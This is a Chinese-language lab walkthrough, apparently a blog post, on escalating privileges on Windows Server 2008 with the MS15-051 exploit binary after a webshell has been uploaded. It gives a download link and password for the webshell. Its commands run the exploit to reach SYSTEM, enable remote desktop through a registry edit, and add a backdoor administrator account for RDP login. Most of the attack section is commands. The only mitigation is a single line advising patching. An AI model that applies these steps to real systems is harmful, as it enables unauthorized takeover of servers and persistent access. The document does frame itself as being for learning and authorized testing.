【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权

目录

漏洞影响的操作系统

操作步骤:

msf进行攻击方法:

加固方式:


MS15-051简介

Windows 内核模式驱动程序中的漏洞可能允许特权提升 (3057191) , 如果攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。
攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
攻击者必须拥有有效的登录凭据并能本地登录才能利用此漏洞。 远程或匿名用户无法利用此漏洞。

声明:以下的提权的介绍只适用于学习和授权情况下的操作,请勿用于非法环境!

漏洞影响的操作系统

Windows Server 2003

Windows Vista

Windows Server 2008

Windows Server 2008 R2 

环境准备:

攻击(攻击者)主机:      

windows2010         物理机      

                   

                       

目标(受害者)主机:        

winddows2008      虚拟机          

Nat    

     

192.168.254.133                        

                                  

 

很多时候,当我们上传了一句话木马之后,想要进行一些操作。比如,查看当前用户的身份,这时会发现权限不够,当前的命令行只对网站当前目录下的文件具有操作权限,对其他目录和系统都没有权限,这时我们就需要提权了。

我们把下面两个程序上传到网站目录下去
 

大马下载:

   链接:https://pan.baidu.com/s/1fq6B6W7GBR-D4qjerB6qwg
   提取码:68ks
   登陆大马密码:xiaowang520

工具下载传送门


操作步骤:

【步骤一】上传(这里是直接复制进行的,构建环境)大马到目标网页主目录,并在物理机上进行登陆,结果如【图1】所示:

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第1张图片

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第2张图片

图1

【步骤二】查看系统版本及补丁情况,结果如【图1】所示:

【命令】

systemifo  //查看系统版本及补丁情况

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第3张图片

图2

【分析】目标服务器系统未进行补丁

【步骤三】查看用户权限,结果如【图3】所示:

【命令】

whoami  //查看用户权限

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第4张图片

图3

【分析】】未取得系统system权限,需进行提权

【步骤三】上传ms15-051x64.exe至一个可执行的目录【C:\Windows\Temp】,进行提权,结果如【图3】所示:

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第5张图片

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第6张图片

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第7张图片

图3

【步骤四】查看权限,,结果如【图4】所示:

【命令】

C:\Windows\Temp\ms15-051x64.exe "whoami"  //查看权限

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第8张图片

图4

【分析】system用户说明提权成功
【步骤五】查看是否开启3389端口,并开启3389端口,结果如【图5】所示:

【命令】

C:\Windows\Temp\ms15-051x64.exe "netstat -ano"  //查看是否开启3389端口

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第9张图片

开启3389端口,复制下面代码,创建一个*.bat的文件,上传到【C:\Windows\Temp】目录下:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第10张图片

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第11张图片

 C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\1.bat"

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第12张图片

C:\Windows\Temp\ms15-051x64.exe "netstat -ano"

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第13张图片

图5

【分析】开启3389端口成功

【步骤六】:创建一个可以加入管理员组的用户,进行远程桌面登陆,【创建系统用户的时候,密码一定要大小写混合,才符合windows2008创建用户的条件,不然创建用户会失败】结果如【图6】所示:

【命令】

C:\Windows\Temp\ms15-051x64.exe "net user adm Xye123456 /add"
C:\Windows\Temp\ms15-051x64.exe "net localgroup administrators adm /add"
C:\Windows\Temp\ms15-051x64.exe "net localgroup administrators "

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第14张图片

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第15张图片

图6

【步骤八】:进行远程桌面登陆,结果如【图7】所示:

【命令】

mstsc

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第16张图片

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第17张图片

【内网提权】windows2008本地提权-------利用ms15-051x64.exe提权_第18张图片

图7

msf进行攻击方法:

资料:传送门

加固方式:

寻找漏洞相应的补丁,打补丁

你可能感兴趣的:(后渗透,网络安全,安全,其他,http,shell)